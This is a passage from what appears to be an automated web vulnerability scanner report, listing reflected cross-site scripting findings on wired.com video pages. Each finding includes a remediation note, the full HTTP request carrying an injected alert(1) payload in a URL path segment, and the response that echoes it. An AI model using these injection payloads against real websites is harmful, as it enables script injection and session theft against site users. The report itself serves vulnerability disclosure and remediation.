Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:46:44 GMT
Date: Mon, 22 Nov 2010 00:41:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest9f235"><a>b8db29e0880">
...[SNIP]...

1.1122. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eacf"-alert(1)-"d294990f37b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest7eacf"-alert(1)-"d294990f37b/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:27 GMT
Date: Mon, 22 Nov 2010 00:42:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106808


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
"text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "danny-boyle-traps-james-franco-in-chasm-for-127-hours","latest-videos","650949108001","1815816633","latest7eacf"-alert(1)-"d294990f37b","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1123. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c957"-alert(1)-"58f021e9e0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/18158166331c957"-alert(1)-"58f021e9e0d/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:36 GMT
Date: Mon, 22 Nov 2010 00:42:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
"text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "danny-boyle-traps-james-franco-in-chasm-for-127-hours","latest-videos","650949108001","latest","18158166331c957"-alert(1)-"58f021e9e0d","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1124. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03ae"-alert(1)-"0b563d8314b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hoursf03ae"-alert(1)-"0b563d8314b/650949108001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:47:43 GMT
Date: Mon, 22 Nov 2010 00:42:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106709


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "danny-boyle-traps-james-franco-in-chasm-for-127-hoursf03ae"-alert(1)-"0b563d8314b","latest-videos","650949108001","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1125. http://www.wired.com/video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/650949108001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b449"-alert(1)-"0bf58a7d3e0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/danny-boyle-traps-james-franco-in-chasm-for-127-hours/6509491080019b449"-alert(1)-"0bf58a7d3e0 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 00:47:49 GMT
Date: Mon, 22 Nov 2010 00:42:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106800


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
"text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "danny-boyle-traps-james-franco-in-chasm-for-127-hours","latest-videos","latest","1815816633","6509491080019b449"-alert(1)-"0bf58a7d3e0","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1126. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b932e--><script>alert(1)</script>cd14f4422d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videob932e--><script>alert(1)</script>cd14f4422d2/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29467
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:00 GMT
Date: Mon, 22 Nov 2010 00:36:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videob932e--><script>alert(1)</script>cd14f4422d2/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001
-->
...[SNIP]...

1.1127. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89964"><a>de99cc590e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video89964"><a>de99cc590e1/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29428
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:39:52 GMT
Date: Mon, 22 Nov 2010 00:34:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video89964"><a>de99cc590e1 ss_latest-videos c_latest">
...[SNIP]...

1.1128. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86122"><a>8261dbdb8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos86122"><a>8261dbdb8fd/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=290
Expires: Mon, 22 Nov 2010 00:40:55 GMT
Date: Mon, 22 Nov 2010 00:36:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos86122"><a>8261dbdb8fd c_latest">
...[SNIP]...

1.1129. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a57"-alert(1)-"bc5972f94a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos38a57"-alert(1)-"bc5972f94a3/latest/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:05 GMT
Date: Mon, 22 Nov 2010 00:37:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos38a57"-alert(1)-"bc5972f94a3","latest","1815816633","disneys-cars-2-goes-international","677756918001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1130. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d3"><a>da689d17cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/lateste93d3"><a>da689d17cc4/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:10 GMT
Date: Mon, 22 Nov 2010 00:37:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106774


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_lateste93d3"><a>da689d17cc4">
...[SNIP]...

1.1131. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40533"-alert(1)-"ada59dabe1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest40533"-alert(1)-"ada59dabe1a/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:42:37 GMT
Date: Mon, 22 Nov 2010 00:38:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","1815816633","disneys-cars-2-goes-international","latest40533"-alert(1)-"ada59dabe1a","677756918001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1132. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353eb"-alert(1)-"5378680b007 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633353eb"-alert(1)-"5378680b007/disneys-cars-2-goes-international/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:17 GMT
Date: Mon, 22 Nov 2010 00:38:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","disneys-cars-2-goes-international","677756918001","1815816633353eb"-alert(1)-"5378680b007","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1133. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b25d5"-alert(1)-"54d4edc213d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/disneys-cars-2-goes-internationalb25d5"-alert(1)-"54d4edc213d/677756918001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:29 GMT
Date: Mon, 22 Nov 2010 00:38:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","disneys-cars-2-goes-internationalb25d5"-alert(1)-"54d4edc213d","677756918001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1134. http://www.wired.com/video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db679"-alert(1)-"571402115f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001db679"-alert(1)-"571402115f6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=274
Expires: Mon, 22 Nov 2010 00:43:15 GMT
Date: Mon, 22 Nov 2010 00:38:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","677756918001db679"-alert(1)-"571402115f6","disneys-cars-2-goes-international","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

